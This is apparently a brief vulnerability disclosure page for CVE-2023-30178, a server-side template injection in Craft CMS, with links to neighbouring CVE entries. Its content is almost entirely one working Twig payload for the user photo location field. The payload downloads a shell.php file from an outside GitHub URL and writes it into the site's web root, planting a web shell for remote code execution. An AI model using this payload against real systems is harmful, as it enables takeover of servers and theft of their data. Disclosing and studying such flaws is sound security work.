[CVE-2023-30178] Server-Side Template Injection




Previous[CVE-2023-30177] Stored - Cross Site Script (XSS)Next[CVE-2023-30179] Server-Side Template Injection
Last updated
SSTI_UserPhotoLocation_RCE{% set source=['https://raw.githubusercontent.com/datnlq/CraftCMS/main/shell.php']|map('file_get_contents')|join %} {{{(source):"/var/www/html/craft_cms/web/shell.php"}|map("file_put_contents")|join()}}